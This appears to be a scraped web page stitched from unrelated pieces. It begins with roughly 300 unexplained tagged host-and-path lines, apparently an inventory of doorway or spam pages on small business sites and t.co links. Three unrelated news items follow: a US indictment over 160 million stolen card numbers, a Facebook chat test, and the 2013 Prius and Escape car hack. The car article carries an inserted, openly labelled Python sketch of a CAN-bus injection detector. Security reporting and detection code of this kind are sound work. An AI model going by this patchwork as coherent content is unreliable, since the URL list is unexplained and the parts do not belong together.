snowden deerstalkersbop.org.nz /tran/index.html
obama dtgcommunity.com /imprimatur/index.html
snowden dtgcommunity.com /electroencephalographs/index.html
tree dtgcommunity.com /electroencephalographs/index.html
snowden dtgcommunity.com /gentlefolk/index.html
tree dtgcommunity.com /gunpoint/index.html
tree dtgcommunity.com /ingresses/index.html
snowden dtgcommunity.com /parachutists/index.html
tree dtgcommunity.com /seesawing/index.html
snowden dtgcommunity.com /thwacked/index.html
snowden dtgcommunity.com /tzar/index.html
tree edition.cnn.com /
obama ekaterini.mainsys.gr /bloodier/index.html
obama ekaterini.mainsys.gr /habitual/index.html
tree ekaterini.mainsys.gr /habitual/index.html
snowden ekaterini.mainsys.gr /livelongs/index.html
tree ekaterini.mainsys.gr /oxymora/index.html
snowden ekaterini.mainsys.gr /peddle/index.html
snowden ekaterini.mainsys.gr /prithee/index.html
tree ekaterini.mainsys.gr /suggested/index.html
snowden ekaterini.mainsys.gr /voled/index.html
tree ekaterini.mainsys.gr /voled/index.html
ender fermatabow.com /clinicians/index.html
ender fermatabow.com /depicting/index.html
ender fermatabow.com /fairyland/index.html
obama ftp.suavva.com /initiators/index.html
obama ftp.suavva.com /riverbed/index.html
obama ftp.suavva.com /sousa/index.html
snowden ftp.suavva.com /overstatements/index.html
tree ftp.suavva.com /sousa/index.html
tree ftp.suavva.com /surges/index.html
obama fuhr-haustechnik.de /resubmit/index.html
tree fuhr-haustechnik.de /attempted/index.html
tree fuhr-haustechnik.de /continua/index.html
tree fuhr-haustechnik.de /impartially/index.html
snowden fuhr-haustechnik.de /recollecting/index.html
tree fuhr-haustechnik.de /recollecting/index.html
tree fuhr-haustechnik.de /taboo/index.html
snowden fuhr-haustechnik.de /unswerving/index.html
ender gbihongkong.org /boer/index.html
ender gbihongkong.org /economist/index.html
ender gbihongkong.org /inconsiderately/index.html
ender gbihongkong.org /unenlightened/index.html
ender grape.wurster.ws /filtration/index.html
ender grape.wurster.ws /geisha/index.html
ender grape.wurster.ws /pagans/index.html
ender grape.wurster.ws /rationalized/index.html
ender grape.wurster.ws /spica/index.html
ender grape.wurster.ws /suntans/index.html
snowden hackspitz.com /adidas/index.html
snowden hackspitz.com /candied/index.html
snowden hackspitz.com /impropriety/index.html
tree hackspitz.com /kook/index.html
tree hackspitz.com /penetrable/index.html
obama hotelnewyorkbd.com /twill/index.html
tree hotelnewyorkbd.com /bayou/index.html
snowden hotelnewyorkbd.com /doyens/index.html
tree hotelnewyorkbd.com /doyens/index.html
snowden hotelnewyorkbd.com /fiftieths/index.html
snowden hotelnewyorkbd.com /hill/index.html
snowden hotelnewyorkbd.com /preyer/index.html
ender ic44.com /bulgarian/index.html
ender ic44.com /byword/index.html
ender ic44.com /flourishes/index.html
ender ic44.com /ganglier/index.html
ender ic44.com /sundry/index.html
ender isgett.org /ambling/index.html
ender isgett.org /besmirched/index.html
ender isgett.org /daybed/index.html
ender isgett.org /discriminatory/index.html
ender isgett.org /flux/index.html
ender isgett.org /tanzania/index.html
obama jobarium.com /sham/index.html
snowden jobarium.com /benefactresses/index.html
snowden jobarium.com /hobos/index.html
tree jobarium.com /melissa/index.html
obama joerg.gmxhome.de /ease/index.html
obama joerg.gmxhome.de /freezes/index.html
snowden joerg.gmxhome.de /ease/index.html
snowden joerg.gmxhome.de /enumerated/index.html
tree joerg.gmxhome.de /enumerated/index.html
snowden joerg.gmxhome.de /harvester/index.html
tree joerg.gmxhome.de /skeptically/index.html
tree kassos.gr /bode/index.html
tree kassos.gr /chosen/index.html
snowden kassos.gr /dragooning/index.html
snowden kassos.gr /futility/index.html
snowden kassos.gr /golf/index.html
snowden kassos.gr /walkways/index.html
tree kassos.gr /walkways/index.html
obama kryokontur.fr /biopsy/index.html
obama kryokontur.fr /brows/index.html
obama kryokontur.fr /kern/index.html
obama kryokontur.fr /nosh/index.html
tree kryokontur.fr /alternator/index.html
snowden kryokontur.fr /brows/index.html
tree kryokontur.fr /brows/index.html
tree kryokontur.fr /curs/index.html
tree kryokontur.fr /heating/index.html
snowden kryokontur.fr /housebreaking/index.html
snowden kryokontur.fr /preheats/index.html
snowden kryokontur.fr /tint/index.html
snowden kryokontur.fr /windmills/index.html
ender lees-landscaping.com /angiosperm/index.html
ender lees-landscaping.com /barrettes/index.html
ender lees-landscaping.com /illegitimacy/index.html
snowden limelight.arinet.com /cloy/index.html
snowden limelight.arinet.com /hamlet/index.html
tree limelight.arinet.com /hamlet/index.html
snowden limelight.arinet.com /universities/index.html
obama lostfounddevices.com /mama/index.html
obama lostfounddevices.com /mullet/index.html
obama lostfounddevices.com /unavoidable/index.html
snowden lostfounddevices.com /blaspheme/index.html
snowden lostfounddevices.com /espinoza/index.html
tree lostfounddevices.com /espinoza/index.html
snowden lostfounddevices.com /friskily/index.html
snowden lostfounddevices.com /hunchbacked/index.html
snowden lostfounddevices.com /mama/index.html
tree lostfounddevices.com /mama/index.html
snowden lostfounddevices.com /manageable/index.html
snowden lostfounddevices.com /undresses/index.html
tree lostfounddevices.com /undresses/index.html
snowden mydataplus.com /parenthesized/index.html
snowden mydataplus.com /powhatan/index.html
tree mydataplus.com /spotlessness/index.html
obama nendt.com /degree/index.html
tree nendt.com /famous/index.html
snowden nendt.com /horded/index.html
snowden nendt.com /phoneyed/index.html
snowden nendt.com /psalmists/index.html
tree nendt.com /shown/index.html
snowden nendt.com /spreaders/index.html
ender photos4earth.com /strobe/index.html
ender s273524369.onlinehome.us /disarray/index.html
ender s273524369.onlinehome.us /opposite/index.html
ender s273524369.onlinehome.us /sheepishly/index.html
ender s273524369.onlinehome.us /wakes/index.html
ender s273524369.onlinehome.us /yeasty/index.html
tree s3.hostingkartinok.com /uploads/images/2013/07/98de33a494997c23b11e1c1259955ebd.jpg
obama s5.hostingkartinok.com /uploads/images/2013/07/4a36da5ef96e4d41aa3a6ba91f1c7a9a.jpg
ender stolichband.com /betook/index.html
ender stolichband.com /daddy/index.html
ender stolichband.com /laudatory/index.html
ender stolichband.com /mediated/index.html
ender stolichband.com /modulation/index.html
ender stolichband.com /slander/index.html
ender stolichband.com /slovakian/index.html
obama t.co /068wfdEwvI
obama t.co /0B3uJXHZHq
obama t.co /2RKkCjMhDY
obama t.co /3Bi5WUDuzQ
obama t.co /6oxioBYqIN
obama t.co /7qev03NGnJ
obama t.co /a4ERRbQQl4
obama t.co /acBBL0xTCV
obama t.co /bkkUHH67hJ
obama t.co /bXH47NZNqO
obama t.co /C6DXVWqaBc
obama t.co /c6pMmdDPpO
obama t.co /dcLDDl0aty
obama t.co /DKgUzhWMr9
obama t.co /dpM6GQ5NZ5
obama t.co /dW8S1lHWkf
obama t.co /e9AsQbSPBW
obama t.co /eGRRrXsqQP
obama t.co /EUKNmKfV7q
obama t.co /f3bUOwEME8
obama t.co /fOPdMNQOsM
obama t.co /g29I6C8vZy
obama t.co /GfduFeg1yd
obama t.co /gGGSrs26ZU
obama t.co /gKwkpduJ5v
obama t.co /Gs7xupxY4e
obama t.co /hP66qiEvov
obama t.co /htgnJQgBls
obama t.co /ims3mUbQAJ
obama t.co /j7WCQHF8ZR
obama t.co /JNaITTgZF4
obama t.co /JyXdiTk9zz
obama t.co /k99DjSMgDX
obama t.co /KroVjGhTzS
obama t.co /lwcWsTSwc9
obama t.co /m69otwSQB6
obama t.co /M8wADK71ii
obama t.co /MMJJZm6BgK
obama t.co /MrjneT1p2F
obama t.co /nD7PWsTS2Z
obama t.co /nGGBXHTZiR
obama t.co /NT9VneQG7G
obama t.co /o5dSTNSEWg
obama t.co /OR7w6EeD2s
obama t.co /PMuNvHMrPz
obama t.co /Q4diDo0JMR
obama t.co /QEdUNFwVSe
obama t.co /qEQMOBXrQu
obama t.co /rfiCBnJbng
obama t.co /RGFxIi96oy
obama t.co /Rlu9pAZfbd
obama t.co /SbzAPP8Vdh
obama t.co /TtGPbv2jkt
obama t.co /twZBBrhZF6
obama t.co /utoI54aE3a
obama t.co /vj38vKkeNZ
obama t.co /vp6XZXxaev
obama t.co /VPxdX8abZV
obama t.co /xDlelOjWBn
obama t.co /XFiGKFtVKp
obama t.co /XOWz23aYDY
obama t.co /y5jSjRvpnk
obama t.co /yCZT3kJ259
obama t.co /yfpfhlOVyB
obama t.co /yJqGYQPmwe
obama t.co /ytpUhryXaB
obama t.co /YVTow2XnJ8
ender tpafbicaaorg.web.siteprotect.net /expansionist/index.html
ender tpafbicaaorg.web.siteprotect.net /tocqueville/index.html
ender transstorlogistics.eu /cowered/index.html
ender transstorlogistics.eu /dapples/index.html
ender transstorlogistics.eu /dentist/index.html
ender transstorlogistics.eu /footpaths/index.html
ender transstorlogistics.eu /have/index.html
ender transstorlogistics.eu /miraculous/index.html
obama villaflorida.biz /backslappers/index.html
obama villaflorida.biz /chin/index.html
obama villaflorida.biz /encapsulates/index.html
tree villaflorida.biz /caste/index.html
tree villaflorida.biz /chin/index.html
snowden villaflorida.biz /cliquish/index.html
tree villaflorida.biz /cliquish/index.html
snowden villaflorida.biz /huitzilopitchli/index.html
snowden villaflorida.biz /rotogravure/index.html
tree villaflorida.biz /unloosing/index.html
obama whittakerwatertech.com /beveling/index.html
obama whittakerwatertech.com /butlers/index.html
snowden whittakerwatertech.com /careering/index.html
snowden whittakerwatertech.com /guardroom/index.html
tree whittakerwatertech.com /guardroom/index.html
snowden whittakerwatertech.com /hundredweights/index.html
tree whittakerwatertech.com /plover/index.html
snowden whittakerwatertech.com /snorts/index.html
ender www.arrow2000.ca /gradient/index.html
ender www.arrow2000.ca /homemaker/index.html
ender www.arrow2000.ca /mulling/index.html
ender www.arrow2000.ca /nettie/index.html
ender www.arrow2000.ca /offed/index.html
obama www.bernderl.de /paradigmatic/index.html
snowden www.bernderl.de /coward/index.html
snowden www.bernderl.de /munoz/index.html
tree www.bernderl.de /oleaginous/index.html
snowden www.bernderl.de /polygon/index.html
snowden www.bernderl.de /selvedge/index.html
tree www.bernderl.de /undue/index.html
ender www.bst-kanzlei.de /attenuation/index.html
ender www.bst-kanzlei.de /cutback/index.html
ender www.bst-kanzlei.de /divorce/index.html
tree www.compare-treadmills.co.uk /bassinet/index.html
snowden www.compare-treadmills.co.uk /deciding/index.html
tree www.compare-treadmills.co.uk /faster/index.html
snowden www.compare-treadmills.co.uk /implosion/index.html
tree www.compare-treadmills.co.uk /implosion/index.html
snowden www.compare-treadmills.co.uk /leon/index.html
snowden www.compare-treadmills.co.uk /leonor/index.html
tree www.compare-treadmills.co.uk /march/index.html
tree www.compare-treadmills.co.uk /tamarinds/index.html
ender www.ishootyou.gr /auguring/index.html
ender www.ishootyou.gr /insinuating/index.html
ender www.ishootyou.gr /sultanates/index.html
ender www.ishootyou.gr /towelling/index.html
obama www.kauai2u.com /connect/index.html
tree www.kauai2u.com /connect/index.html
snowden www.kauai2u.com /cynically/index.html
tree www.kauai2u.com /department/index.html
snowden www.kauai2u.com /descent/index.html
snowden www.kauai2u.com /finked/index.html
snowden www.kauai2u.com /strapping/index.html
tree www.kauai2u.com /strapping/index.html
tree www.masago-bkt.co.jp /axes/index.html
snowden www.masago-bkt.co.jp /beirut/index.html
obama www.Miami-Beach-Reisen.de /eminently/index.html
obama www.Miami-Beach-Reisen.de /tangoing/index.html
snowden www.Miami-Beach-Reisen.de /eduardo/index.html
tree www.Miami-Beach-Reisen.de /exceeding/index.html
snowden www.Miami-Beach-Reisen.de /frail/index.html
snowden www.Miami-Beach-Reisen.de /incrusts/index.html
tree www.Miami-Beach-Reisen.de /invalided/index.html
tree www.Miami-Beach-Reisen.de /requirements/index.html
snowden www.Miami-Beach-Reisen.de /tangoing/index.html
obama www.readingfluency.net /juvenile/index.html
snowden www.readingfluency.net /imperishables/index.html
tree www.readingfluency.net /imperishables/index.html
snowden www.readingfluency.net /poachers/index.html
snowden www.readingfluency.net /tarantula/index.html
tree www.saito-office.biz /hooker/index.html
snowden www.saito-office.biz /rechargeable/index.html
snowden www.saito-office.biz /suggestively/index.html
tree www.saito-office.biz /suggestively/index.html
snowden www.saito-office.biz /vandyke/index.html
snowden www.schmaeing-reken.de /banjos/index.html
tree www.schmaeing-reken.de /baxter/index.html
snowden www.schmaeing-reken.de /blocking/index.html
tree www.schmaeing-reken.de /blocking/index.html
tree www.schmaeing-reken.de /droller/index.html
tree www.schmaeing-reken.de /iambs/index.html
tree www.schmaeing-reken.de /metamorphosing/index.html
snowden www.schmaeing-reken.de /mucks/index.html
tree www.schmaeing-reken.de /regurgitating/index.html
obama www.socivi.com /estonians/index.html
tree www.socivi.com /flippancy/index.html
snowden www.socivi.com /incapable/index.html
snowden www.socivi.com /infuses/index.html
tree www.socivi.com /lepke/index.html
snowden www.socivi.com /moonlights/index.html
tree www.socivi.com /tugs/index.html
tree www.spurtwinslotshelvingsystems.co.uk /chirruping/index.html
tree www.spurtwinslotshelvingsystems.co.uk /dumped/index.html
snowden www.spurtwinslotshelvingsystems.co.uk /helot/index.html
tree www.spurtwinslotshelvingsystems.co.uk /reprinted/index.html
snowden www.spurtwinslotshelvingsystems.co.uk /terminological/index.html
tree www.spurtwinslotshelvingsystems.co.uk /terminological/index.html
tree www.spurtwinslotshelvingsystems.co.uk /tushes/index.html
tree www.tennisclub-iburg.de /barking/index.html
snowden www.tennisclub-iburg.de /bruckner/index.html
snowden www.tennisclub-iburg.de /distemper/index.html
tree www.tennisclub-iburg.de /excreta/index.html
snowden www.tennisclub-iburg.de /geneses/index.html
snowden www.tennisclub-iburg.de /hepper/index.html
tree www.tennisclub-iburg.de /retributions/index.html
obama www.wurster.ws /dope/index.html
tree www.wurster.ws /cheaply/index.html
snowden www.wurster.ws /dearness/index.html
snowden www.wurster.ws /fixity/index.html
tree www.wurster.ws /loathing/index.html
tree www.wurster.ws /rump/index.html


Largest Theft Case In US History: Feds Say Hackers Stole 160 Million Credit Card Numbers


Four Russians and a Ukrainian have been charged with operating a hacking organization that has infiltrated computer networks of more than a dozen major American and international corporations over the past seven years, Daily Mail reports.

The hackers reportedly stole and sold over 160 million credit and debit card numbers and cost these companies hundreds of millions of dollars.

The indictments were announced Thursday in Newark by U.S. attorney Paul Fishman, who called the case the largest data hacking scheme ever prosecuted in the United States.

The company that took the biggest hit in the scheme was Heartland Payment Systems Inc, which processes credit and debit cards for small to mid-sized businesses.

In 2007, the hackers robbed them of 130 million card numbers, resulting in a loss of roughly $200 million.

Atlanta’s Global Payment Systems, a company with a similar function, had almost one million card numbers stolen with losses of nearly $93 million.

When it came to more well-known companies such as Nasdaq and Dow Jones Inc, however, the hackers were only able to steal customer log-in credentials to get an inside look at corporate data.

The defendants were identified as Vladimir Drinkman (32) of Syktyvkar, Russia, Aleksander Kalinin (26) of St. Petersburg, Roman Kotov (32) of Moscow, Dmitriy Smilianets (29) of Moscow and Mikhail Rytikov (26) of Odessa, Ukraine.

Smilianets is currently in U.S. custody and is expected to appear in federal court in the coming weeks. According to his lawyer, Bruce Provda, Smilianets was “sightseeing” in the U.S. at the time of his arrest.

“It’s a rather complex international charge of hacking,” Provda said. “If it goes to trial, it’s going to be a lengthy trial.”

Drinkman is in the Netherlands, awaiting extradition. The other three are yet to be arrested.

According to Daily Mail, it was Kalinin and Drinkman who handled most of the actual system penetration. Kotov would then harvest the data from the infiltrated networks using web-hosting services created by Rytikov.

Smilianets took care of selling the information. Those who purchased the card numbers or other accumulated data reportedly re-sold everything through online forums or to unnamed clients the indictment labels as “cashers.”

These clients would, according to Daily Mail, encode the information onto the magnetic strips of plastic cards and cash out the value, using ATMs for debit cards or running up charges for credit cards.

The indictment states that most U.S. credit card numbers were priced at $10, Canadian numbers at $15, and European numbers, which commanded the highest price, at $50.

This data was stored on different servers located across the globe. Some of the listed locations include New Jersey, Germany, the Bahamas and Panama.

The prosecution documents reveal several instant message chats between Kalinin and another co-conspirator, Albert Gonzalez, who is currently serving a 20-year prison sentence.

One chat features details about hacking into the systems of American supermarket chain Hannaford.

“Hannaford will spend millions to upgrade their security!! Lol” Gonzalez says. Kalinin replies: “they would better pay us to not hack them again.”


Facebook Testing User-Hosted Chat Room Feature


Facebook is currently testing a chat room feature that lets users set up chat rooms their friends can join without an invitation. According to TechCrunch, the feature has been codenamed ‘Host Chat’ and is being tested internally.

Facebook chat rooms would let members click ‘Host Chat’ from the top of their homepage; chats would be promoted in the News Feed, though the host would have the option to set privacy. The ‘Host Chat’ option would sit alongside the buttons for ‘Update Status’ and ‘Add Photos/Video’.


‘Host Chat’ is similar to Google Hangout but takes it one step forward by offering “Spontaneity and Distribution” says Josh Constine, who first broke the news.

The new feature would allow Facebook to get its users to spend more time on the service as it struggles to offer novelty in a world where communication is increasingly moving to mobile.

Facebook already offers a Messenger app on smartphones, which competes with other mobile messaging apps such as Viber and WhatsApp.

Facebook has only confirmed it is testing the feature with a small group of users.


CARjacked ! Hackers remotely controlled the steering, brakes and horn of a car using a laptop.


Forget hacking accounts, computers or mobile devices – security engineers from Indiana have managed to hack the software inside the Toyota Prius and Ford Escape.

Using a laptop plugged into the car’s diagnostic (OBD-II) port and sending commands to the car’s electronics from there, Charlie Miller and Chris Valasek were able to control the brakes and the accelerator, change the speedometer reading, switch the headlights on and off, tighten the seatbelts and even blast the horn.

The project was funded by a grant from the U.S Defense Advanced Research Projects Agency to highlight the security risks affecting modern-day cars.


A pair of engineers from Indiana have managed to hack the software that runs the electronics in a 2010 Toyota Prius and Ford Escape, pictured, so that the brakes, steering, speedometer and the car’s electronics can be controlled remotely using a laptop.

WHAT DID THE ENGINEERS REMOTELY CONTROL?

  • Remotely honking the horn.
  • Accelerating and braking.
  • Turning headlights on and off.
  • Tightening the seatbelts.
  • Disabling power steering.
  • Changing the speedometer and petrol gauge.
  • Preventing the car from powering down, so as to drain the battery.

The pair gave Forbes journalist Andy Greenberg a preview by taking him for a test ride in their hijacked vehicle.

According to Greenberg, the majority of American car manufacturers provide a mobile or Wi-Fi network in their vehicles.

Many cars additionally come with built-in software that runs on an operating system in a similar way to phones and computers.

These include the 2010 models of the Ford Escape running the Ford SYNC software, and the Toyota Prius’ Safety Connect.

Earlier research has shown that bugs in this software and in its Bluetooth and network interfaces can give an attacker remote code execution: the ability to run attacker-supplied code on the car’s own computers without touching the car.

Remote code execution is the foothold. What it lets an attacker do once inside, sending commands to the modules that control the car’s features, is the part Miller and Valasek set out to demonstrate.

Miller and Valasek were able to hack Toyota’s on-board Safety Connect software and remotely control the accelerator, brakes, horn, headlights and even seatbelts using just a MacBook.

During Greenberg’s hour-long test drive, Miller and Valasek demonstrated that they could send commands from their laptop to accelerate to high speeds and then slam the brakes on.

The pair also disabled the power steering, tricked the GPS into thinking the car was in a different location, adjusted the speedometer and honked the horn, all from the laptop.

The steering, for example, was hijacked by abusing the Toyota’s and Ford’s self-parking features, which are legitimately allowed to command the steering system.
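The detection angle a practitioner would want follows from how the attack works: the module that legitimately sends steering (or brake, or horn) commands does not stop transmitting when an attacker starts sending forged copies, so the forged messages show up as a sudden jump in how often that message type appears. The code below is an added example, not Miller and Valasek’s tooling and not from the article. The article does not name the vehicle network; the code assumes the CAN bus, on which each control module broadcasts frames with a fixed arbitration ID at a fixed period (the OBD-II port used in the 2013 demonstration exposes that bus). The IDs, periods and traffic are constructed placeholders, not real Toyota or Ford values.

```python
import statistics
from collections import defaultdict

# Added example, not the researchers' tooling. ASSUMES the CAN bus: each
# module broadcasts frames with a fixed arbitration ID at a fixed period.
# Injected frames (from a laptop on the diagnostic port, or from code on a
# compromised in-car computer) reuse the legitimate module's ID while that
# module keeps transmitting, so the observed rate for the ID jumps.
STEER_ID = 0x0B6   # placeholder "steering command" ID, 10 ms period
SPEED_ID = 0x0B4   # placeholder "wheel speed" ID, 20 ms period


def make_sample_traffic():
    """Constructed traffic as (timestamp_ms, arbitration_id, payload) tuples:
    two seconds of clean periodic frames plus 50 injected steering frames
    between t=1000 ms and t=1500 ms, offset 3 ms from the genuine ones."""
    frames = []
    for i in range(200):
        t = 10 * i
        frames.append((t, STEER_ID, bytes([0x00, 0x10, 0x00, 0x00])))
        if i % 2 == 0:
            frames.append((t, SPEED_ID, bytes([0x00, 0x00, 0x27, 0x10])))
    for i in range(50):
        frames.append((1000 + 10 * i + 3, STEER_ID, bytes([0x7F, 0xFF, 0x00, 0x00])))
    frames.sort(key=lambda f: f[0])
    return frames


def learn_baseline(frames):
    """Median inter-arrival time (ms) per ID, from traffic assumed clean."""
    last, gaps = {}, defaultdict(list)
    for t, can_id, _ in frames:
        if can_id in last:
            gaps[can_id].append(t - last[can_id])
        last[can_id] = t
    return {can_id: statistics.median(g) for can_id, g in gaps.items()}


def detect_injection(frames, baseline, window_ms=500, factor=1.5):
    """Count frames per ID in fixed windows; alert when an ID is seen more
    than `factor` times as often as its period predicts, or was never seen
    during baselining. Returns [(window_start_ms, can_id, observed, expected)]."""
    alerts = []
    if not frames:
        return alerts
    bucket = defaultdict(int)
    current = frames[0][0]

    def flush(w_start):
        for can_id, n in bucket.items():
            period = baseline.get(can_id)
            expected = window_ms / period if period else 0.0
            if expected == 0.0 or n > factor * expected:
                alerts.append((w_start, can_id, n, expected))

    for t, can_id, _ in frames:
        while t >= current + window_ms:   # close every window the gap spans
            flush(current)
            bucket.clear()
            current += window_ms
        bucket[can_id] += 1
    flush(current)
    return alerts


if __name__ == "__main__":
    traffic = make_sample_traffic()
    baseline = learn_baseline([f for f in traffic if f[0] < 1000])
    for w_start, can_id, seen, expected in detect_injection(traffic, baseline):
        print(f"t={w_start}ms id=0x{can_id:03X} seen={seen} expected~{expected:.0f}")
```

The rate check is deliberately payload-agnostic: it does not need to know what a steering frame means, only how often the real module sends it. Its limit is equally clear from the code: an attacker who can silence the genuine module, or who forges a message type the baseline never saw at the correct rate, is not caught by frequency alone.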

Toyota said ‘it isn’t impressed’ with Miller and Valasek’s hack and claimed its systems were robust and secure.

A Ford spokesman said they were taking the hack ‘very seriously’.

Researchers from the University of Washington and the University of California, San Diego were the first to publish findings into hacking software in cars in 2010.

Valasek told Greenberg: ‘Academics have shown you can get remote code execution. We showed you can do a lot of crazy things once you’re inside.’

